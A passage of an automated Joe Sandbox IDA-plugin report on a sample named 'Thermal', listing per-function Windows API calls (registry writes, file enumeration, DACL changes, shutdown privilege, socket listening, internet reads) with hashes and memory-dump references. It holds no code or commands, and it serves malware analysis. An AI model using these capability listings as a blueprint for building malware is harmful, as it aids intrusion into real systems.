                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: 548f6f5047056131bd2d94f935f01e96adf2e1aba9e1f5be2448148bcdb36671
                                                • Instruction ID: 1bce222e9a643b1aa5f505217226e0306c9372204d89ad3c560e6eca9d40d9cd
                                                • Opcode Fuzzy Hash: 548f6f5047056131bd2d94f935f01e96adf2e1aba9e1f5be2448148bcdb36671
                                                • Instruction Fuzzy Hash: 28A13DB1404305EBD715EBA4D989DAFB7ECFF94700F404919F589C6191EB38EA09CBA2
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0FB3
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00800980,00000000,?,00000000,?,?), ref: 007F1021
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F1069
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F10F2
                                                • RegCloseKey.ADVAPI32(?), ref: 007F1412
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F141F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 6b9dbf933e559f83a1ccc86d54cadff52fa983d56f61e94f4b26fe685c3b4d27
                                                • Instruction ID: 3c5b974fb452d10821406128dd331c05df517947c58689cab352f6ef24fbcc54
                                                • Opcode Fuzzy Hash: 6b9dbf933e559f83a1ccc86d54cadff52fa983d56f61e94f4b26fe685c3b4d27
                                                • Instruction Fuzzy Hash: B1022675200615DFCB24EF25C855A2AB7E5FF89710F04895CFA9A9B362CB38EC41CB91
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007DF756
                                                • _wcscmp.LIBCMT ref: 007DF76B
                                                • _wcscmp.LIBCMT ref: 007DF782
                                                  • Part of subcall function 007D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D4890
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF7B1
                                                • FindClose.KERNEL32(00000000), ref: 007DF7BC
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF7D8
                                                • _wcscmp.LIBCMT ref: 007DF7FF
                                                • _wcscmp.LIBCMT ref: 007DF816
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF828
                                                • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF846
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF850
                                                • FindClose.KERNEL32(00000000), ref: 007DF85D
                                                • FindClose.KERNEL32(00000000), ref: 007DF86F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*$j}
                                                • API String ID: 1824444939-110696414
                                                • Opcode ID: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                • Instruction ID: 1978482bd5678b78cc21e95c87b5d2ed0da2f6fc54aeacf1964e96f8f0c223de
                                                • Opcode Fuzzy Hash: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                • Instruction Fuzzy Hash: 5231B871501219BEDF10ABB4EC48ADE77BCEF09321F104166E815E63A1DB38DE459F51
                                                APIs
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                  • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                  • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                  • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                  • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                  • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                  • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8931
                                                • _memset.LIBCMT ref: 007C8946
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8965
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8976
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C89B3
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C89CF
                                                • GetLengthSid.ADVAPI32(?), ref: 007C89EC
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C89FB
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8A02
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8A23
                                                • CopySid.ADVAPI32(00000000), ref: 007C8A2A
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8A5B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8A81
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8A95
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                • Instruction ID: 2b773c433b1d5d5d8a16738fd1dc5c8020f4d99afeda8f18582fbacd97542c53
                                                • Opcode Fuzzy Hash: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                • Instruction Fuzzy Hash: C4610675A00209EFDF40DFA5DC45FEEBB79BB44300F04812EE915AA291DB399A15CFA1
                                                APIs
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0B0C
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F0BAB
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F0C43
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F0E82
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0E8F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: 7cadcfdfbd24a85f15129f6089698520f953eaf45a45c0e6780289b7b9219494
                                                • Instruction ID: 7b397809ab43630b7e9ab929d78811a1b25570e095095042f41271f9a78e563a
                                                • Opcode Fuzzy Hash: 7cadcfdfbd24a85f15129f6089698520f953eaf45a45c0e6780289b7b9219494
                                                • Instruction Fuzzy Hash: 13E13A71204214EFCB14EF25C895E2ABBE9EF89714F04896DF949DB362DA34E901CB91
                                                APIs
                                                • __swprintf.LIBCMT ref: 007D4451
                                                • __swprintf.LIBCMT ref: 007D445E
                                                  • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 007D4488
                                                • LoadResource.KERNEL32(?,00000000), ref: 007D4494
                                                • LockResource.KERNEL32(00000000), ref: 007D44A1
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 007D44C1
                                                • LoadResource.KERNEL32(?,00000000), ref: 007D44D3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 007D44E2
                                                • LockResource.KERNEL32(?), ref: 007D44EE
                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007D454F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                • String ID:
                                                • API String ID: 1433390588-0
                                                • Opcode ID: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                • Instruction ID: 9e58948659f9e8fa2296819beae02d78ac3bf3dcbcb6d89d8cd9adfcb1634282
                                                • Opcode Fuzzy Hash: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                • Instruction Fuzzy Hash: 94317E7150125AABDF119FA0EC49EBB7BB8FF04301F004826F916D6251EB78DA61CBB0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                • Instruction ID: 5a8e88fd8cd5bbae52288570fe0f658254f2c06f46fcefa298c2d325fa5c0573
                                                • Opcode Fuzzy Hash: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                • Instruction Fuzzy Hash: 8B219131205250EFDB51AF25EC09F2E77A9FF98711F008019F94A9B261CB39AD00CF95
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DFA83
                                                • FindClose.KERNEL32(00000000), ref: 007DFB96
                                                  • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • Sleep.KERNEL32(0000000A), ref: 007DFAB3
                                                • _wcscmp.LIBCMT ref: 007DFAC7
                                                • _wcscmp.LIBCMT ref: 007DFAE2
                                                • FindNextFileW.KERNEL32(?,?), ref: 007DFB80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 2185952417-438819550
                                                • Opcode ID: e6a6986a285fe0ebc5c9aa1fc846eb4f9e1b346e77c37398920f0f6f92a99510
                                                • Instruction ID: 041429db76404c4aa29c9b2ec19bbfddb8b00ff239347ffada9bc777d72e0d18
                                                • Opcode Fuzzy Hash: e6a6986a285fe0ebc5c9aa1fc846eb4f9e1b346e77c37398920f0f6f92a99510
                                                • Instruction Fuzzy Hash: 4C4170B194021A9FCF14DF64CC59AEEBBB8FF05350F548167E819A2291EB389E45CF90
                                                APIs
                                                  • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                  • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                  • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                • ExitWindowsEx.USER32(?,00000000), ref: 007D57B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                • Instruction ID: b1c999189ad5600f9ea08af4e31665447676f41227cd8bf244a0ad1243f54cb3
                                                • Opcode Fuzzy Hash: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                • Instruction Fuzzy Hash: E601F731751712EBE76862A49C8EFBB7778EB04770F34002BF913D22D2DA685C008550
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E69C7
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E69D6
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E69F2
                                                • listen.WSOCK32(00000000,00000005), ref: 007E6A01
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6A1B
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6A2F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                • Instruction ID: cf8312b2dd2087edc50563581911f1cecff112f6444106add1216f27743ddd30
                                                • Opcode Fuzzy Hash: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                • Instruction Fuzzy Hash: D6219170600604DFCB50EF64CC49B6EB7A9EF48760F14C569E95AA7391CB78AC01CB91
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00771DD6
                                                • GetSysColor.USER32(0000000F), ref: 00771E2A
                                                • SetBkColor.GDI32(?,00000000), ref: 00771E3D
                                                  • Part of subcall function 0077166C: DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                • Instruction ID: bcbe69ac337071af7e32b8414d0688de4443a78c4f5051de83951cb26d526c3a
                                                • Opcode Fuzzy Hash: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                • Instruction Fuzzy Hash: 3DA17CB0305408FADF3C6B6D4C49E7B255EEB82381F94C60AF509D5182CA2DDD01DB75
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC329
                                                • _wcscmp.LIBCMT ref: 007DC359
                                                • _wcscmp.LIBCMT ref: 007DC36E
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DC37F
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DC3AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                • Opcode ID: 03fc90a074d7d4efbc9e1ed01ddc2435d05eeea597238ffcb6b973f51a6563ff
                                                • Instruction ID: 0cb071ff5d46cf231230197d72d287112c8b6f4a232a95bc02ba35af4a54471a
                                                • Opcode Fuzzy Hash: 03fc90a074d7d4efbc9e1ed01ddc2435d05eeea597238ffcb6b973f51a6563ff
                                                • Instruction Fuzzy Hash: F1518935604602CFD715DF68D494AAAB7E8FF49320F10861EE95ACB3A1DB38AD05CB91
                                                APIs
                                                  • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E6E89
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6EB2
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E6EEB
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6EF8
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6F0C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                • Instruction ID: 3362a015bb197b51cbeb8119b50da4b303183dc377c90e9646091b2f912456fc
                                                • Opcode Fuzzy Hash: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                • Instruction Fuzzy Hash: 4E41A275700214EFDF20AF649C8AF6E77A8EB48750F04C558FA59AB3D2DB789D008B91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                • Instruction ID: 5b133b7e595ab629ac2b2321df30444571014090c74fd16f4f5e1cadc6a2b59f
                                                • Opcode Fuzzy Hash: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                • Instruction Fuzzy Hash: 1D118672300A159FEB215F26DC88B3A7B99FF44761F058129EA45D7341DB78AD118ED0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                • Instruction ID: e32425fa2fdb5ee13f476c7b8e9934a9c5e3712eb849db186c88b9f70ee89b9a
                                                • Opcode Fuzzy Hash: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                • Instruction Fuzzy Hash: 19D01271804218EACB08AA90D848FFB737CFB04300F144052F546E2040D23D9798EB62
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007E1ED6,00000000), ref: 007E2AAD
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E2AE4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: 7558d95bef27a403ab5894ae06de8d8a8909b468b74b5e63015dc1895a70cd27
